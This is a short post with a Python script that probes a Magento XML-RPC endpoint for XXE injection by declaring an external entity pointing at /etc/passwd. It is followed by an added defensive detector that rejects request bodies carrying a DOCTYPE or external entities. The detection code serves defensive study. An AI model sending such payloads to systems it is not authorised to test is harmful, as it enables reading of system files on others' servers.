Exploit Magento Zend Vulnerability


    If you want to check whether your Magento installation is affected by the XXE injection in the XML-RPC API, here is my short Python script for it. You'll need Python and Requests, plus the following script, which you may need to configure for your installation:

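    import requests

    # XML-RPC endpoint of the installation to check (configure for your setup)
    url = ''
    # File the external entity points at
    filename = "/etc/passwd"
    # DOCTYPE declaring an external entity "xxe" that refers to `filename`
    data = """<?xml version="1.0"?>
     <!DOCTYPE foo [
      <!ELEMENT methodName ANY >
      <!ENTITY xxe SYSTEM "file://""" + filename + """">]>"""
    print(data)
    # Send the XML as the raw request body (not form-encoded)
    r = requests.post(url, data=data)
    print(r.text)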

    It doesn't look like much, but the hard part was finding out how to post data in a non-HTML-form way.

    My own tests with this showed me that nearly no file is accessible from outside.
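
A defensive counterpart to the check above, added here as an example and not part of the original post: legitimate XML-RPC calls carry no DTD, so an endpoint or proxy can reject any request body that declares a DOCTYPE or an external entity. The function names and sample bodies are constructed for illustration; the parser is Python's built-in expat binding, which does not fetch external entities unless an `ExternalEntityRefHandler` is installed.

```python
from xml.parsers import expat

def inspect_xmlrpc_body(body: bytes) -> dict:
    """Report whether a request body has a DOCTYPE and which external entities it declares."""
    report = {"doctype": False, "external_entities": []}
    parser = expat.ParserCreate()  # no encoding given: expat honours BOM / XML declaration

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones have value None
        # and a SYSTEM (and optionally PUBLIC) identifier instead.
        if value is None:
            report["external_entities"].append((name, system_id, public_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        pass  # malformed XML: keep whatever was declared before the error
    return report

def should_block(body: bytes) -> bool:
    """Policy: legitimate XML-RPC calls carry no DTD, so any DOCTYPE is rejected."""
    report = inspect_xmlrpc_body(body)
    return report["doctype"] or bool(report["external_entities"])

# Constructed samples. The DOCTYPE is the one from the script above; the call itself
# is an ordinary request that does not reference the entity.
SAMPLE_WITH_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<methodCall><methodName>system.listMethods</methodName></methodCall>"""
SAMPLE_CLEAN = b"""<?xml version="1.0"?>
<methodCall><methodName>system.listMethods</methodName></methodCall>"""

if __name__ == "__main__":
    for label, body in (("with DTD", SAMPLE_WITH_DTD), ("clean", SAMPLE_CLEAN)):
        print(label, should_block(body), inspect_xmlrpc_body(body))
```

Because the body is handed to a real XML parser rather than matched with a regular expression, the same check also catches the declaration when the request is sent in UTF-16.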